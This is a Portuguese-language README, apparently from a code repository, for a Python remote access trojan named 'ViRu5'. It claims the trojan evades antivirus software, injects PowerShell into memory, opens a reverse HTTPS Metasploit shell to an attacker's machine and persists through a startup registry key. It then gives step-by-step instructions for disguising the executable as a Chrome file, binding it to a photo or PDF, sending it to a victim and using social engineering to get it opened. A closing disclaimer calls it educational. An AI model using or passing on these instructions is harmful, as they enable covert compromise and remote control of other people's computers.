Este é um RAT python indetectável completo que pode ignorar quase todos os antivírus e abrir uma porta traseira dentro de qualquer máquina do Windows , que estabelecerá uma conexão inversa https Metasploit para sua máquina de escuta
ViRu5 ciclo de vida
- Ignore todos os antivírus.
- Injetar um malicioso PowerShell script em memória.
- Estabeleça uma conexão https reversa para a máquina atacante.
- Verifique a cada 10 segundos e verifique se a conexão ainda existe. Se não, ele irá restabelecer uma nova conexão.
- Adicione uma chave de registro de inicialização para reconectar-se ao atacante após a reinicialização.
Passos
- Atualize os parâmetros viRu5 / source.py com seu lhost e lport
- Altere o nome da fonte.py para GoogleChromeAutoLaunch.py
- Adicione GoogleChromeAutoLaunch.py, setup.py e seu ícone como icon.ico para c: \ python27 dir
- Do cmd docd c: \ python27python setup.py py2exe
- Encontre o arquivo rer exe no Dist dir.
- Aperte-o com qualquer foto, pdf, palavra ou qualquer tipo de arquivos
- Envie para a vítima
- Use suas habilidades de engenheiro social para fazê-lo abrir o arquivo
- Você receberá uma conexão inversa https metasoplit :)
Testando em
- Windows 7 32bit
- Windows 7 64bit
- Windows 8 32bit
- Windows 8 64bit
- Windows 8.1 32bit
- Windows 8.1 64 bit
- Windows 10 32bit
- Windows 10 64bit
aviso Legal
Isso é apenas para propósitos educacionais. Em primeiro lugar, este código visa alertar as pessoas sobre problemas de segurança, máquinas infectadas não pisadas.